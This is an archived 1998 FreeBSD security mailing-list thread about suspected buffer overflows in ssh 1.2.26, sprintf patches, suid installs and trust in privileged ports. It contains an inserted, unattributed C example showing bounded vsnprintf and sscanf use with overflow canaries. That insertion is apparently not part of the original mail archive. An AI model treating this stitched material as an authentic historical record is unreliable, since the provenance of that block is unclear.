> I read that too, yeah. Basically, I've seen evidence of provable
> buffer overflows (but not proven exploitability of same) and I've seen
> a hacked site whose admins can't think of many other ways to be hacked
> and are pointing either correctly or incorrectly at ssh as the cause
> in their first round of theories. Either way, it's just all too
> guessy for me right now - I'd sure like to see an actual exploit here
> before declaring this most security scare concluded. :(

Indeed. I attempted to keep my original message fairly neutral for that
reason. At this point there isn't any reason not to go about fixing these
potential problems though.

--
| Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS |
| winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax |
| http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? |

From owner-freebsd-security Sun Nov 1 18:26:39 1998
Date: Mon, 2 Nov 1998 13:26:18 +1100
From: Peter Jeremy
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
To: freebsd-security@FreeBSD.ORG, winter@jurai.net
Message-Id: <98Nov2.132551est.40330@border.alcanet.com.au>

"Matthew N. Dodd" wrote:
> At this point there isn't any reason not to go about fixing these
> potential problems though.

ssh also contains a large number of sprintf() calls. Not all of these
are immediately innocuous. There are also 2 sscanf() calls with %s
formats which could be dangerous. Not to mention the str[n]cat() and
str[n]cpy() calls. Unfortunately I have another bushfire to worry
about right now, or I'd check through them as well.

The problem with C is that there are too many ways to shoot yourself
in the foot... A full security audit on ssh (which it sounds like it
might need) would be fairly time-consuming.

Peter
--
Peter Jeremy (VK2PJ)            peter.jeremy@alcatel.com.au
Alcatel Australia Limited
41 Mandible St                  Phone: +61 2 9690 5019
ALEXANDRIA NSW 2015             Fax:   +61 2 9690 5247

From owner-freebsd-security Sun Nov 1 19:28:34 1998
Message-ID: <19981101192724.A26335@best.com>
Date: Sun, 1 Nov 1998 19:27:24 -0800
From: "Jan B. Koum"
To: Peter Jeremy
Cc: freebsd-security@FreeBSD.ORG, winter@jurai.net
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
References: <98Nov2.132551est.40330@border.alcanet.com.au>
In-Reply-To: <98Nov2.132551est.40330@border.alcanet.com.au>; from Peter Jeremy on Mon, Nov 02, 1998 at 01:26:18PM +1100

On Mon, Nov 02, 1998 at 01:26:18PM +1100, Peter Jeremy wrote:
> "Matthew N. Dodd" wrote:
> > At this point there isn't any reason not to go about fixing these
> > potential problems though.
>
> ssh also contains a large number of sprintf() calls. Not all of these
> are immediately innocuous. There are also 2 sscanf() calls with %s
> formats which could be dangerous. Not to mention the str[n]cat() and
> str[n]cpy() calls. Unfortunately I have another bushfire to worry
> about right now, or I'd check through them as well.
>
> The problem with C is that there are too many ways to shoot yourself
> in the foot... A full security audit on ssh (which it sounds like it
> might need) would be fairly time-consuming.
>
> Peter
> --
> Peter Jeremy (VK2PJ)            peter.jeremy@alcatel.com.au
> Alcatel Australia Limited
> 41 Mandible St                  Phone: +61 2 9690 5019
> ALEXANDRIA NSW 2015             Fax:   +61 2 9690 5247

Which is why when you install ssh, you can run ./configure with
"--disable-suid-ssh" argument.
-- Yan

From owner-freebsd-security Sun Nov 1 20:31:02 1998
Date: Sun, 1 Nov 1998 21:29:32 -0700 (MST)
From: Paul Hart
To: "Jan B. Koum"
Cc: Peter Jeremy, freebsd-security@FreeBSD.ORG, winter@jurai.net
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <19981101192724.A26335@best.com>

On Sun, 1 Nov 1998, Jan B. Koum wrote:
> Which is why when you install ssh, you can run ./configure with
> "--disable-suid-ssh" argument.

Which is a good thing, except for this time where the alleged hole appears
to be in sshd, a problem a non-SUID ssh won't help.

Paul Hart

--
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security Sun Nov 1 20:36:48 1998
Message-Id: <4.1.19981101213518.0462e910@127.0.0.1>
Date: Sun, 01 Nov 1998 21:36:03 -0700
To: "Jan B. Koum", Peter Jeremy
From: Brett Glass
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
Cc: freebsd-security@FreeBSD.ORG, winter@jurai.net
In-Reply-To: <19981101192724.A26335@best.com>
References: <98Nov2.132551est.40330@border.alcanet.com.au>

At 07:27 PM 11/1/98 -0800, Jan B. Koum wrote:
> Which is why when you install ssh, you can run ./configure with
> "--disable-suid-ssh" argument.

What does this argument do? (Yes, I've already applied patches and also
replaced a few sprintf()s.)

--Brett

From owner-freebsd-security Sun Nov 1 20:54:23 1998
Message-ID: <19981101205404.A6579@best.com>
Date: Sun, 1 Nov 1998 20:54:04 -0800
From: "Jan B. Koum"
To: Paul Hart
Cc: Peter Jeremy, freebsd-security@FreeBSD.ORG, winter@jurai.net
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
References: <19981101192724.A26335@best.com>
In-Reply-To: ; from Paul Hart on Sun, Nov 01, 1998 at 09:29:32PM -0700

On Sun, Nov 01, 1998 at 09:29:32PM -0700, Paul Hart wrote:
> On Sun, 1 Nov 1998, Jan B. Koum wrote:
>
> > Which is why when you install ssh, you can run ./configure with
> > "--disable-suid-ssh" argument.
>
> Which is a good thing, except for this time where the alleged hole appears
> to be in sshd, a problem a non-SUID ssh won't help.
>
> Paul Hart
>
> --
> Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
> hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

Uhm.. I know that. I was replying to the message which talked about
possible buffer overflow problems with ssh client. :)

-- Yan

From owner-freebsd-security Sun Nov 1 21:00:47 1998
Date: Mon, 2 Nov 1998 00:00:23 -0500 (EST)
From: Robert Watson
Reply-To: Robert Watson
To: "Jan B. Koum"
Cc: Peter Jeremy, freebsd-security@FreeBSD.ORG, winter@jurai.net
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <19981101192724.A26335@best.com>

On Sun, 1 Nov 1998, Jan B. Koum wrote:
> > The problem with C is that there are too many ways to shoot yourself
> > in the foot... A full security audit on ssh (which it sounds like it
> > might need) would be fairly time-consuming.
>
> Which is why when you install ssh, you can run ./configure with
> "--disable-suid-ssh" argument.

I imagine that the concern in the rootshell case is more that the daemon
must run as root. It needs to do so for three reasons (that I can think
of offhand):

1) To bind port 22
2) To read the system-wide SSH private key
and most importantly:
3) To allow it to acquire the privileges of the user who is logging in

An alternative might be to have SSH run as non-root, give it a capability
to have it bind 22, have the private key readable by that user, and then
have it set up sockets to login (I don't know if it can allocate vty's as
non-root?) Then you don't get the SSH RSA-key behavior, but you'd get the
rest. In a sense though, this is equivalent because: a buffer overflow
allows the subversion of that SSH account, then that can be used to attach
via debugging to the other sshd sessions to grab authentication
information being forwarded to login.

I guess you lose either way. Sensitive code (such as authentication code)
must be written carefully.

Robert N Watson

Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.
http://www.tis.com/
SafePort Network Services             http://www.safeport.com/
robert@fledge.watson.org              http://www.watson.org/~robert/

From owner-freebsd-security Sun Nov 1 21:13:37 1998
Date: Mon, 2 Nov 1998 00:13:23 -0500 (EST)
From: "Matthew N. Dodd"
To: Peter Jeremy
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <98Nov2.132551est.40330@border.alcanet.com.au>

On Mon, 2 Nov 1998, Peter Jeremy wrote:
> ssh also contains a large number of sprintf() calls. Not all of these
> are immediately innocuous. There are also 2 sscanf() calls with %s
> formats which could be dangerous. Not to mention the str[n]cat() and
> str[n]cpy() calls. Unfortunately I have another bushfire to worry
> about right now, or I'd check through them as well.

ftp.jurai.net:/users/winter/
    ssh1226.sprintf.patch
    ssh1226.vsprintf.patch

> The problem with C is that there are too many ways to shoot yourself
> in the foot... A full security audit on ssh (which it sounds like it
> might need) would be fairly time-consuming.

Indeed. My approach was (is) to address the easy things that could be
broken. I'll probably work on sscanf issues next unless someone beats me
to it.

Going through the code and fixing improper logic I'll leave to someone
with more of a burr up their ass. :)

--
| Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS |
| winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax |
| http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? |
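The bounded forms of the two call families the thread is worried about (the vsprintf() wrappers the patch replaces, and sscanf() with a bare %s), as an added example that is not code from ssh 1.2.26 or from any of the posted patches: a log()-style wrapper that formats with vsnprintf and reports truncation, and an sscanf whose %s width is generated from the destination size. The function names, LOGBUF, the canary and the "SSH-x.y-ident" banner line are constructed for the demonstration and not taken from the ssh sources.

```c
/* Added example, not code from ssh 1.2.26 or from the patches in this
 * thread: the bounded forms of the two call families under discussion, a
 * log()/fatal()-style wrapper that formats with vsnprintf and reports
 * truncation, and an sscanf() whose %s width is tied to the destination.
 * LOGBUF, the function names and the SSH-x.y-ident banner are constructed. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOGBUF 1024          /* same size as the scp.c buffer in the patch */
#define CANARY "\x5a\x5a\x5a\x5a\x5a\x5a\x5a\x5a"

/* A message buffer with a canary behind it, so nothing written past the end
 * can go unnoticed. */
struct guarded_buf {
    char buf[LOGBUF];
    char guard[8];
};

/* Format like the vsprintf() wrappers in log-server.c/packet.c/scp.c, but
 * bounded. Returns 1 if the whole message fit, 0 if it was truncated.
 * vsnprintf never writes more than bufsz bytes and NUL-terminates when
 * bufsz > 0; under C99 it returns the length the full message would have
 * had, so n >= bufsz means truncation. Pre-C99 libcs returned -1 instead,
 * which the n < 0 test also reports as "did not fit". */
static int format_message(char *buf, size_t bufsz, const char *fmt, ...)
{
    va_list args;
    int n;

    va_start(args, fmt);
    n = vsnprintf(buf, bufsz, fmt, args);
    va_end(args);
    if (n < 0)
        return 0;
    return (size_t)n < bufsz;
}

/* Push a constructed 2047-byte string (standing in for a caller-controlled
 * username or hostname) through format_message(). Returns 1 when truncation
 * was reported, buf is NUL-terminated at its last byte, and the canary is intact. */
static int demo_truncation(void)
{
    struct guarded_buf g;
    char input[2 * LOGBUF];
    int fit;

    memset(input, 'A', sizeof(input) - 1);
    input[sizeof(input) - 1] = '\0';
    memcpy(g.guard, CANARY, sizeof(g.guard));

    fit = format_message(g.buf, sizeof(g.buf), "fatal: %s", input);

    return fit == 0
        && strlen(g.buf) == LOGBUF - 1
        && memcmp(g.guard, CANARY, sizeof(g.guard)) == 0;
}

/* Parse a constructed "SSH-<major>.<minor>-<ident>" line. A bare %s has no
 * bound; here the width is built from identsz at run time so the format can
 * never disagree with the destination. Returns 1 when all three fields parsed. */
static int parse_banner(const char *line, int *major, int *minor,
                        char *ident, size_t identsz)
{
    char fmt[40];

    if (identsz < 2)
        return 0;
    snprintf(fmt, sizeof(fmt), "SSH-%%d.%%d-%%%us", (unsigned)(identsz - 1));
    return sscanf(line, fmt, major, minor, ident) == 3;
}

/* Banner whose ident is far longer than the 16-byte destination. Returns 1
 * when the numbers parsed, ident holds exactly 15 bytes, and the canary is intact. */
static int demo_bounded_scan(void)
{
    struct { char ident[16]; char guard[8]; } s;
    const char *line =
        "SSH-1.5-constructed-ident-that-is-much-longer-than-sixteen-bytes";
    int major = 0, minor = 0;

    memset(s.ident, 0, sizeof(s.ident));
    memcpy(s.guard, CANARY, sizeof(s.guard));

    if (!parse_banner(line, &major, &minor, s.ident, sizeof(s.ident)))
        return 0;
    return major == 1 && minor == 5
        && strlen(s.ident) == sizeof(s.ident) - 1
        && memcmp(s.guard, CANARY, sizeof(s.guard)) == 0;
}

int main(void)
{
    printf("vsnprintf wrapper contained the overflow: %d\n", demo_truncation());
    printf("bounded sscanf contained the overflow:    %d\n", demo_bounded_scan());
    return 0;
}
```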
From owner-freebsd-security Sun Nov 1 21:13:50 1998
Message-Id: <199811020513.VAA25455@burka.rdy.com>
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <19981101192724.A26335@best.com> from "Jan B. Koum" at "Nov 1, 1998 7:27:24 pm"
To: jkb@best.com (Jan B. Koum)
Date: Sun, 1 Nov 1998 21:13:36 -0800 (PST)
Cc: peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, winter@jurai.net
Organization: HackerDome
Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)

Jan B. Koum writes:
> Which is why when you install ssh, you can run ./configure with
> "--disable-suid-ssh" argument.

Which will introduce tons of other problems.

> -- Yan

-- dima

From owner-freebsd-security Sun Nov 1 21:16:03 1998
Date: Mon, 2 Nov 1998 00:15:40 -0500 (EST)
From: "Matthew N. Dodd"
To: Brett Glass
Cc: "Jan B. Koum", Peter Jeremy, freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <4.1.19981101213518.0462e910@127.0.0.1>

On Sun, 1 Nov 1998, Brett Glass wrote:
> What does this argument do? (Yes, I've already applied patches and also
> replaced a few sprintf()s.)

The client is installed suid root (for various reasons). The option in
question disables this behavior.

As sshd is binding and listening to a port below 1024 it must run as root.
The alleged problem with sshd lies in the code that logs connections etc.

--
| Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS |
| winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax |
| http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? |

From owner-freebsd-security Sun Nov 1 21:39:23 1998
Message-ID: <19981101213817.A11911@best.com>
Date: Sun, 1 Nov 1998 21:38:17 -0800
From: "Jan B. Koum"
To: dima@best.net
Cc: peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, winter@jurai.net
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
References: <19981101192724.A26335@best.com> <199811020513.VAA25455@burka.rdy.com>
In-Reply-To: <199811020513.VAA25455@burka.rdy.com>; from Dima Ruban on Sun, Nov 01, 1998 at 09:13:36PM -0800

On Sun, Nov 01, 1998 at 09:13:36PM -0800, Dima Ruban wrote:
> Jan B. Koum writes:
> > Which is why when you install ssh, you can run ./configure with
> > "--disable-suid-ssh" argument.
>
> Which will introduce tons of other problems.

Such as?

I have been using ssh this way for about a year and haven't seen any.
Then again - I am not doing anything fancy with ssh. And no, I don't
need to have ssh installed suid just to get .rhost type authentication.

-- Yan

From owner-freebsd-security Sun Nov 1 22:47:33 1998
Message-Id: <199811020647.WAA25893@burka.rdy.com>
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <19981101213817.A11911@best.com> from "Jan B. Koum" at "Nov 1, 1998 9:38:17 pm"
To: jkb@best.com (Jan B. Koum)
Date: Sun, 1 Nov 1998 22:47:20 -0800 (PST)
Cc: dima@best.net, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, winter@jurai.net
Organization: HackerDome
Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)

Jan B. Koum writes:
> On Sun, Nov 01, 1998 at 09:13:36PM -0800, Dima Ruban wrote:
> > Jan B. Koum writes:
> > > Which is why when you install ssh, you can run ./configure with
> > > "--disable-suid-ssh" argument.
> >
> > Which will introduce tons of other problems.
>
> Such as?
>
> I have been using ssh this way for about a year and haven't
> seen any. Then again - I am not doing anything fancy with ssh.
> And no, I don't need to have ssh installed suid just to get
> .rhost type authentication.

Let me ask you this. Would you trust a packet that came from a
non-privileged port and which wants to do something that even remotely
should be secure?

> -- Yan

-- dima

From owner-freebsd-security Sun Nov 1 23:35:19 1998
Date: Mon, 2 Nov 1998 02:34:52 -0500 (EST)
From: "Matthew N. Dodd"
To: Dima Ruban
Cc: "Jan B. Koum", peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <199811020647.WAA25893@burka.rdy.com>

On Sun, 1 Nov 1998, Dima Ruban wrote:
> Let me ask you this. Would you trust a packet that came from a
> non-privileged port and which wants to do something that even
> remotely should be secure?

The concept of 'secure port' is somewhat dated in this age of NT and Linux
lusers.

The bar for entry onto the net is quite a bit lower than it was 10 years
ago.

Trusting a 'secure port' is a good way to let someone else shoot you in
the foot.

--
| Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS |
| winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax |
| http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? |

From owner-freebsd-security Sun Nov 1 23:36:27 1998
Date: Mon, 2 Nov 1998 00:32:12 -0800 (PST)
From: Jim Shankland
Message-Id: <199811020832.AAA15786@biggusdiskus.flyingfox.com>
To: dima@best.net
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199811020647.WAA25893@burka.rdy.com>

dima@best.net (Dima Ruban) writes:
> Let me ask you this. Would you trust a packet that came from a
> non-privileged port and which wants to do something that even
> remotely should be secure?

No. Same as for a packet that came from a privileged port.

A packet's source port is a pretty weak authenticator, to coin
an understatement.

Jim Shankland
NLynx Systems, Inc.

From owner-freebsd-security Mon Nov 2 00:00:51 1998
Message-Id: <199811020800.AAA26243@burka.rdy.com>
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: from "Matthew N. Dodd" at "Nov 2, 1998 2:34:52 am"
To: winter@jurai.net (Matthew N. Dodd)
Date: Mon, 2 Nov 1998 00:00:38 -0800 (PST)
Cc: dima@best.net, jkb@best.com, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG
From: dima@best.net (Dima Ruban)

Matthew N. Dodd writes:
> On Sun, 1 Nov 1998, Dima Ruban wrote:
> > Let me ask you this. Would you trust a packet that came from a
> > non-privileged port and which wants to do something that even
> > remotely should be secure?
>
> The concept of 'secure port' is somewhat dated in this age of NT and Linux
> lusers.
>
> The bar for entry onto the net is quite a bit lower than it was 10 years
> ago.
>
> Trusting a 'secure port' is a good way to let someone else shoot you in
> the foot.

Heh. I see you run nfs on your machine. Now tell me, do you actually
allow weak NFS authentication, or do you actually somehow rely on
"privileged port" stuff?

I'm not arguing about whether it's good or bad to have privileged
ports as they are now. All I'm saying is if a packet came from a
privileged port, then this packet was sent by root. It's a totally
different question whether you can 100% believe this information.

-- dima

From owner-freebsd-security Mon Nov 2 00:19:53 1998
Message-ID: <19981102021805.A5345@znh.org>
Date: Mon, 2 Nov 1998 02:18:05 -0600
From: Zach Heilig
To: dima@best.net, "Jan B. Koum"
Cc: peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, winter@jurai.net
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
References: <19981101213817.A11911@best.com> <199811020647.WAA25893@burka.rdy.com>
In-Reply-To: <199811020647.WAA25893@burka.rdy.com>; from Dima Ruban on Sun, Nov 01, 1998 at 10:47:20PM -0800

On Sun, Nov 01, 1998 at 10:47:20PM -0800, Dima Ruban wrote:
> Jan B. Koum writes:
> > I have been using ssh this way for about a year and haven't
> > seen any. Then again - I am not doing anything fancy with ssh.
> > And no, I don't need to have ssh installed suid just to get
> > .rhost type authentication.

> Let me ask you this. Would you trust a packet that came from a non-privileged
> port and which wants to do something that even remotely should be secure?

There probably isn't much of a difference between privileged and
non-privileged ports anymore (if there ever was). Specifically, any
connection coming from a < 1024 port (from an unknown host) is just as
untrustworthy as a connection from a >= 1024 port (from an unknown host).
If the connection is from a known host, it's not much more trustworthy,
due to spoofing.
-- 
Zach Heilig
If it looks like a duck, and quacks like a duck, we have to at least consider
the possibility that we have a small aquatic bird of the family Anatidæ on
our hands (Douglas Adams -- Dirk Gently's Holistic Detective Agency)

From owner-freebsd-security Mon Nov 2 00:23:29 1998
Date: Mon, 2 Nov 1998 03:23:16 -0500 (EST)
From: "Matthew N. Dodd"
To: Dima Ruban
cc: jkb@best.com, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <199811020800.AAA26243@burka.rdy.com>

On Mon, 2 Nov 1998, Dima Ruban wrote:
> Heh. I see you run nfs on your machine. Now tell me, do you actually
> allow weak NFS authentication, or do you actually somehow rely on
> "privileged port" stuff?

I'm relying on mountd to disallow mount requests from all IPs but known
good ones.

Actually, thanks for pointing this out; sasami only uses NFS for some
weird AMD tricks and should even be honoring any portmap connections from
the world. I've fixed this. (Why can't we get tcpwrappers in tree and
enable HBA for portmap by default?)

> I'm not arguing about whether it's good or bad to have privileged
> ports as they are now. All I'm saying is if a packet came from a
> privileged port, then this packet was sent by root. It's a totally
> different question whether you can 100% believe this information.

From a security standpoint, you have to assume that anything you hear is a
lie.

-- 
| Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS |
| winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax |
| http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? |

From owner-freebsd-security Mon Nov 2 00:29:59 1998
Message-Id: <199811020829.AAA26460@burka.rdy.com>
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: from "Matthew N. Dodd" at "Nov 2, 1998 3:23:16 am"
To: winter@jurai.net (Matthew N. Dodd)
Date: Mon, 2 Nov 1998 00:29:48 -0800 (PST)
Cc: dima@best.net, jkb@best.com, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG
From: dima@best.net (Dima Ruban)

Matthew N. Dodd writes:
> On Mon, 2 Nov 1998, Dima Ruban wrote:
> > Heh. I see you run nfs on your machine. Now tell me, do you actually
> > allow weak NFS authentication, or do you actually somehow rely on
> > "privileged port" stuff?
>
> I'm relying on mountd to disallow mount requests from all IPs but known
> good ones.

Don't forget about spoofing :-)

> Actually, thanks for pointing this out; sasami only uses NFS for some
> weird AMD tricks and should even be honoring any portmap connections from
> the world. I've fixed this. (Why can't we get tcpwrappers in tree and
> enable HBA for portmap by default?)

Use a firewall.

> > I'm not arguing about whether it's good or bad to have privileged
> > ports as they are now. All I'm saying is if a packet came from a
> > privileged port, then this packet was sent by root. It's a totally
> > different question whether you can 100% believe this information.
>
> From a security standpoint, you have to assume that anything you hear is a
> lie.

There's a small difference between feeling reasonably secure and being
paranoid. You can always disconnect yourself completely from the network, you
know. But since you read this mail, I think it would be safe to make an
assumption that you're trying to be reasonably secure (hey, you kinda trust
sendmail, which runs as root etc etc etc etc)

-- dima

From owner-freebsd-security Mon Nov 2 02:31:57 1998
Date: Mon, 2 Nov 1998 23:29:22 +1300 (NZDT)
From: Andrew McNaughton
Reply-To: andrew@squiz.co.nz
To: Dima Ruban
cc: "Matthew N. Dodd", jkb@best.com, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <199811020829.AAA26460@burka.rdy.com>

On Mon, 2 Nov 1998, Dima Ruban wrote:
> Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
>
> Matthew N. Dodd writes:
> > On Mon, 2 Nov 1998, Dima Ruban wrote:
> > > Heh. I see you run nfs on your machine. Now tell me, do you actually
> > > allow weak NFS authentication, or do you actually somehow rely on
> > > "privileged port" stuff?
> >
> > I'm relying on mountd to disallow mount requests from all IPs but known
> > good ones.
>
> Don't forget about spoofing :-)
>
> > Actually, thanks for pointing this out; sasami only uses NFS for some
> > weird AMD tricks and should even be honoring any portmap connections from
> > the world. I've fixed this. (Why can't we get tcpwrappers in tree and
> > enable HBA for portmap by default?)
>
> Use a firewall.
>
> > > I'm not arguing about whether it's good or bad to have privileged
> > > ports as they are now. All I'm saying is if a packet came from a
> > > privileged port, then this packet was sent by root. It's a totally
> > > different question whether you can 100% believe this information.
> >
> > From a security standpoint, you have to assume that anything you hear is a
> > lie.
>
> There's a small difference between feeling reasonably secure and being
> paranoid. You can always disconnect yourself completely from the network, you
> know. But since you read this mail, I think it would be safe to make an
> assumption that you're trying to be reasonably secure (hey, you kinda trust
> sendmail, which runs as root etc etc etc etc)

Sure you trust sendmail as far as you have to on your own machine. In
particular you trust it to guard against malicious clients including those
on other machines.

The whole point of ssh is that it allows you to stop relying on the network
to be secure. Ssh is at its best when the connection is only available on
presentation of an authorised key. Given this there's no need for any
trusted port stuff. It adds nothing. I guess it's nice that rhosts/shosts
authentication is there for those who want it, but to my mind the client
should not be suid by default. At least not for the sake of connecting to
a 'trusted' port.

There is another reason for having a suid client, although ssh doesn't make
use of it. That is for providing a barrier within the client machine which
safeguards the encryption keys and limits which users have access to a given
secure connection. Say you have a cgi script which needs an encrypted
connection to a service on another machine. You want it to be able to use
an authorized key's privileges, but in the case where the script is
compromised, you do not want that key to be stolen.

Ssh doesn't seem to provide for root owned keys though. So you're back to
setting up ssh forwarding from a local port - better than rhosts/shosts, but
some sort of authentication has to be worked out. Probably you use either a
file socket or a suid wrapper to ssh. I guess this could be suid to a
non-root user which has access to the keys.
Andrew McNaughton

From owner-freebsd-security Mon Nov 2 05:09:39 1998
From: Mikael Karpberg
Message-Id: <199811021303.OAA24194@ocean.campus.luth.se>
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <199811020832.AAA15786@biggusdiskus.flyingfox.com> from Jim Shankland at "Nov 2, 98 00:32:12 am"
To: jas@flyingfox.com (Jim Shankland)
Date: Mon, 2 Nov 1998 14:03:45 +0100 (CET)
Cc: dima@best.net, freebsd-security@FreeBSD.ORG

According to Jim Shankland:
> dima@best.net (Dima Ruban) writes:
>
> > Let me ask you this. Would you trust a packet that came from a
> > non-privileged port and which wants to do something that even
> > remotely should be secure?
>
> No. Same as for a packet that came from a privileged port.
>
> A packet's source port is a pretty weak authenticator, to coin
> an understatement.

Why? I'd say it's a pretty safe way of authentication. Especially as a
first check, before you move on to stronger checks. I'd say you can't
spoof it, since the trusted machines on your net (and you check that it's
a trusted machine first, you know) will not let any user grab such ports,
and you (OF COURSE!!!) have a firewall or router between your net and the
internet that will reject any incoming packets with source addresses from
the inside net. It's all in the environment.
/Mikael

From owner-freebsd-security Mon Nov 2 05:24:39 1998
Message-ID: <363DB28D.4A884162@kew.com>
Date: Mon, 02 Nov 1998 08:24:29 -0500
From: Drew Derbyshire
Organization: Kendra Electronic Wonderworks, Stoneham, MA 02180 (http://www.kew.com)
To: dima@best.net
CC: freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
References: <199811020647.WAA25893@burka.rdy.com>

Dima Ruban wrote:
> Would you trust a packet that came from a non-privileged
> port and which wants to do something that even remotely should be secure?

I wouldn't trust it even if it did come from a privileged port simply on
the basis of the port number. Trusted ports require trusted hosts, which
the Net is in short supply of these days.

-ahd-

-- 
Drew Derbyshire   UUPC/extended e-mail: software@kew.com   Telephone: 617-279-9812

Build a system even a fool can use, and only a fool will want to use it.

From owner-freebsd-security Mon Nov 2 06:09:21 1998
From: mike@seidata.com
Date: Mon, 2 Nov 1998 09:09:18 -0500 (EST)
To: freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)

On Mon, 2 Nov 1998, Matthew N. Dodd wrote:
> > Let me ask you this. Would you trust a packet that came from a
> > non-privileged port and which wants to do something that even
> > remotely should be secure?
[snip]
> The concept of 'secure port' is somewhat dated in this age of NT and Linux
> lusers.
[snip]

Question:

How did a discussion that was meant to logically determine the
(un)importance of potential ssh vulnerabilities degrade into a
childish "Linux is for lusers" (I guess I should respect the opinion
of one who can't spell) argument which is currently doing little more
than stating what we all (at least should) already know?

While this thread grows, consumes more and more bandwidth, and gets
more off-topic, who's actually working on this problem and attempting
to resolve it? JKH's posts are the only ones I've seen that are
level headed - let's not go off on tangents and make speculations that
in no way help our cause. There's work to be done.

My (and hopefully the list's) respect to the individual(s) who
actually comes up with proof-of-concept exploit code (to either prove
or disprove ssh claims).

Sorry if this is a little terse - but I don't see how having a
mailbox full of "Did you hear this? and this... and this..." type
messages is going to help our situation. Let's fix it or shut up.
Later,
-mike

From owner-freebsd-security Mon Nov 2 11:01:45 1998
Message-Id: <4.1.19981102021507.00c0b200@127.0.0.1>
Date: Mon, 02 Nov 1998 02:15:44 -0700
To: "Matthew N. Dodd", Peter Jeremy
From: Brett Glass
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
Cc: freebsd-security@FreeBSD.ORG
References: <98Nov2.132551est.40330@border.alcanet.com.au>

Just tried these. Your sprintf patches are failing for some reason....

--Brett

At 12:13 AM 11/2/98 -0500, Matthew N. Dodd wrote:
>On Mon, 2 Nov 1998, Peter Jeremy wrote:
>> ssh also contains a large number of sprintf() calls. Not all of these
>> are immediately innocuous. There are also 2 sscanf() calls with %s
>> formats which could be dangerous. Not to mention the str[n]cat() and
>> str[n]cpy() calls. Unfortunately I have another bushfire to worry
>> about right now, or I'd check through them as well.
>
>ftp.jurai.net:/users/winter/
>
> ssh1226.sprintf.patch
> ssh1226.vsprintf.patch
>
>> The problem with C is that there are too many ways to shoot yourself
>> in the foot... A full security audit on ssh (which it sounds like it
>> might need) would be fairly time-consuming.
>
>Indeed. My approach was (is) to address the easy things that could be
>broken. I'll probably work on sscanf issues next unless someone beats me
>to it. Going through the code and fixing improper logic I'll leave to
>someone with more of a burr up their ass. :)

From owner-freebsd-security Mon Nov 2 12:34:33 1998
Message-Id: <3.0.3.32.19981102143310.0102652c@207.227.119.2>
Date: Mon, 02 Nov 1998 14:33:10 -0600
To: mike@seidata.com, freebsd-security@FreeBSD.ORG
From: "Jeffrey J. Mountin"
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)

At 09:09 AM 11/2/98 -0500, mike@seidata.com wrote:
